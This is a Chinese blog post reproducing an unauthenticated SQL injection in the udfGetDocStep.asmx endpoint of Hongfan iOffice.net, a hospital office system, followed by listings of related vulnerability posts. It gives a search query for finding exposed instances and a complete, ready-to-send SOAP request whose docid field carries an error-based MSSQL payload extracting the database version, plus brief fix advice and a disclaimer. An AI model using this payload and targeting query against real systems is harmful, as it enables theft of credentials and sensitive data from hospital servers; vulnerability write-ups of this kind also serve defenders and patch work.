红帆ioffice-udfGetDocStep.asmx存在SQL注入漏洞

已于 2024-03-06 17:51:41 修改
阅读量985 收藏 3
点赞数 4
分类专栏: 漏洞复现 文章标签: sql 数据库 安全 web安全
于 2024-03-06 10:02:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36618918/article/details/136497474
版权

产品简介

红帆iOffice.net从最早满足医院行政办公需求(传统OA),到目前融合了卫生主管部门的管理规范和众多行业特色应用,是目前唯一定位于解决医院综合业务管理的软件,是最符合医院行业特点的医院综合业务管理平台,是成功案例最多的医院综合业务管理软件。

漏洞描述

红帆iOffice.net udfGetDocStep.asmx接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。

资产测绘

app=“红帆-ioffice”

漏洞复现

POST /ioffice/prg/interface/udfGetDocStep.asmx HTTP/1.1
Host: vulIP
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/GetDocStep"
Content-Length: 565

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body>
    <GetDocStep xmlns="http://tempuri.org/">
        <docid>1'+(SELECT CHAR(103)+CHAR(105)+CHAR(75)+CHAR(83) WHERE 6621=6621 AND 7795 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(122)+CHAR(113)+(SELECT @@version)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(120)+CHAR(113))))+'</docid>
    </GetDocStep>
    </soap:Body>
</soap:Envelope>

查询数据库版本信息
在这里插入图片描述
sqlmap验证
在这里插入图片描述

修复建议

1.升级至安全版本。
2.部署Web应用防火墙,对数据库操作进行监控。

免责声明

本文章仅做网络安全技术研究使用!严禁用于非法犯罪行为,请严格遵守国家法律法规;请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

漏洞复现】红帆-ioffice-udfGetDocStep-sql注入
知黑而守白
03-05 168
红帆HFOffice医微云是广州红帆科技有限公司研发的专注医疗行政办公管理,与企业微信全方位结合,提供协同办公、知识库、专家系统、BI等应用,进一步帮助医院移动办公落地,成就面向医院管理的“智慧管理”。红帆HFOffice udfGetDocStep 接口处存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
红帆OA udfmr.asmx SQL注入漏洞复现
0xSec
08-18 4269
红帆iOffice.netudfmr.asmx接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
漏洞复现】红帆-ioffice-CAWS-sql注入
知黑而守白
03-05 215
红帆HFOffice医微云是广州红帆科技有限公司研发的专注医疗行政办公管理,与企业微信全方位结合,提供协同办公、知识库、专家系统、BI等应用,进一步帮助医院移动办公落地,成就面向医院管理的“智慧管理”。红帆HFOffice CAWS 接口处存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
红帆OA 多处 SQL注入漏洞复现
0xSec
03-04 1190
红帆iOffice.netioDesktopData.asmx、wssRtSyn.asmx、GetWorkUnit.asmxudfGetDocStep.asmx等接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
漏洞复现】红帆-ioffice-list-SQL注入漏洞
知黑而守白
01-17 397
红帆HFOffice医微云是广州红帆科技有限公司研发的专注医疗行政办公管理,与企业微信全方位结合,提供协同办公、知识库、专家系统、BI等应用,进一步帮助医院移动办公落地,成就面向医院管理的“智慧管理”。红帆HFOffice list 接口处存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
红帆ioffice ioassistance2.asmx sql注入
weixin_43567873的博客
03-10 179
红帆ioffice ioassistance2.asmx sql注入
红帆iOffice ioDesktopData.asmx接口存在SQL注入漏洞 附POC软件
nnn2188185的博客
03-04 303
红帆iOffice ioDesktopData.asmx接口存在SQL注入漏洞 附POC软件
漏洞复现】红帆iOffice.net wssRtSyn接口处存在SQL注入
2301_80127209的博客
06-20 982
红帆iOffice.net从最早满足医院行政办公需求(传统OA),到目前融合了卫生主管部门的管理规范和众多行业特色应用,是目前唯一定位于解决医院综合业务管理的软件,是最符合医院行业特点的医院综合业务管理平台,是成功案例最多的医院综合业务管理软件。申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。帮助你在面试中脱颖而出。
漏洞汇总】近十日漏洞汇总(已公布poc)
weixin_45840241的博客
04-27 1056
【代码】【漏洞汇总】近十日漏洞汇总(已公布poc)
漏洞复现-红帆OA系列
aming小老弟
03-15 1734
红帆OA--------------------------------------------fofa:app=“红帆-ioffice
漏洞复现】SQL注入漏洞
zkaqlaoniao的博客
11-09 718
红帆HFOffice医微云是广州红帆科技有限公司研发的专注医疗行政办公管理,与企业微信全方位结合,提供协同办公、知识库、专家系统、BI等应用,进一步帮助医院移动办公落地,成就面向医院管理的“智慧管理”。平台list接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。此漏洞是由于部分用户站点下web.config的Debug的值设置为1,导致系统存在SQL注入漏洞,只需让相关系统站点下web.config的Debug值设为0即可。
SQL面试之--明明建了索引为什么失效了?
m0_57098592的博客
04-27 814
索引相关面试问题
使用Python和Pandas实现的Azure Synapse Dedicated SQL pool权限检查与SQL生成用于IT审计
最新发布
weixin_30777913的博客
05-01 697
下面是使用 Python Pandas 来提取和展示 Azure Synapse Dedicated SQL Pool 中权限信息的完整过程,同时将其功能以自然语言描述,并自动构造所有权限设置的 SQL 语句:✅ 步骤 1:从数据库读取权限信息 我们从数据库中提取与用户、角色、对象、权限类型等有关的信息。 ✅ 步骤 2:自然语言描述权限设置 ✅ 步骤 3:还原SQL语句以便复现权限设置 ✅ 输出示例(伪数据): 自然语言描述示例:角色【Dept_HR】(成员:hr-user@domain.com)对USER
PostgreSQL 中 VACUUM FULL 对索引的影响
文牧之的博客
04-30 949
是的,会重建表上的所有索引。这是它与普通VACUUM命令的一个重要区别。
SQLMesh 审计与测试:确保数据质量的利器
neweastsun的专栏
04-28 1192
审计最简单的形式是使用AUDIT语句定义,后面跟着查询。AUDIT (WHERE在这个例子中,我们定义了一个名为的审计,确保每个寿司商品都有一个价格。
如何有效防止 SQL 注入攻击?
u013379032的博客
04-27 556
ORM 框架(如 Hibernate、Django ORM、Sequelize)自动处理 SQL 转义,减少手写 SQL 的风险。SQL 注入SQL Injection)是黑客通过构造恶意输入,篡改 SQL 查询语句的攻击方式。:转义不如参数化查询安全,某些场景可能失效(如。如果必须拼接 SQL,确保转义特殊字符(如。使用参数化查询 + ORM 是黄金标准。,避免恶意输入被当作 SQL 执行。避免直接拼接 SQL 执行(如。:记录异常 SQL 查询(如。(如数字、邮箱、日期)。(只允许特定字符,如。
基于SpringBoot+PostgreSQL+ROS Java库机器人数据可视化管理系统
战族狼魂的博客
04-27 954
解析接收到的ROS消息(如sensor_msgs/Imu, sensor_msgs/LaserScan, nav_msgs/Odometry等),提取关键数据,添加robotId和时间戳,然后调用DataService存储到TSDB。根据传感器类型变化,如 linear_acceleration_x, angular_velocity_z, range_min, range_max, pose_x, pose_y, orientation_w 等。需要考虑异步处理、批量写入、数据聚合、数据库调优。
SQLyog中DELIMITER执行存储过程时出现的前置缩进问题
星途码客的博客
04-29 302
SQLyog中执行存储过程时出现的前置缩进问题,实际上反映了SQLyog对SQL语句解析的一个特殊行为。而SQLyog等图形工具为提高易用性,会尝试自动解析SQL结构,导致对格式敏感。当代码有缩进时,SQLyog可能错误地将缩进后的内容识别为新的SQL语句。但过程体外的命令(如DELIMITER)必须无缩进。过程体内的缩进不会影响执行(因为是作为整体解析)确保没有开启"智能缩进"或"语法感知缩进"功能。过程体内的缩进保持一致性(4空格或1个tab)直到遇到定义的结束符(如//)才会执行。
deepseek集成ioffice
02-13
### DeepSeek与iOffice集成方案 #### 集成背景说明 DeepSeek作为一个强大的搜索引擎平台,能够帮助企业和组织更高效地管理和检索内部数据。而红帆iOffice作为一款办公自动化软件,在企业日常运营中扮演着重要角色。为了提升工作效率,实现两者之间的无缝对接显得尤为重要。 #### 技术准备事项 在开始集成工作之前,需确认以下几点: - **环境配置** - 确认双方系统的运行环境兼容性。 - 安装必要的依赖库和服务组件。 - **权限设置** - 设置适当的安全策略来保护敏感信息不被未授权访问[^2]。 - 对于涉及到的数据交互部分,应特别关注SQL注入风险防范措施[^1]。 #### API接入流程 针对不同版本的iOffice接口特性,以下是具体的API调用方法: ##### 方法一:通过Web Service方式进行集成 对于支持SOAP协议的服务端点(如`wssRtSyn.asmx`, `ioassistance2.asmx`),可以采用如下Python代码片段完成基本连接测试: ```python from suds.client import Client url = 'http://example.com/wssRtSyn.asmx?wsdl' client = Client(url) response = client.service.someMethod() print(response) ``` ##### 方法二:RESTful风格HTTP请求 如果目标服务提供了基于JSON格式响应的REST API,则推荐使用requests库简化开发过程: ```python import requests api_endpoint = "http://example.com/api/v1/resource" headers = {'Content-Type': 'application/json'} data = {"key": "value"} r = requests.post(api_endpoint, json=data, headers=headers) if r.status_code == 200: result = r.json() else: raise Exception(f"Request failed with status code {r.status_code}") ``` #### 数据同步机制设计 考虑到实际应用场景中的性能需求以及安全性考量,建议采取增量更新模式定期抓取最新变更记录,并利用加密传输通道保障通信安全。 #### 测试验证环节 最后阶段要进行全面的功能性和稳定性检测,确保所有预期功能正常运作的同时也要排查潜在安全隐患,特别是防止SQL注入攻击的发生[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值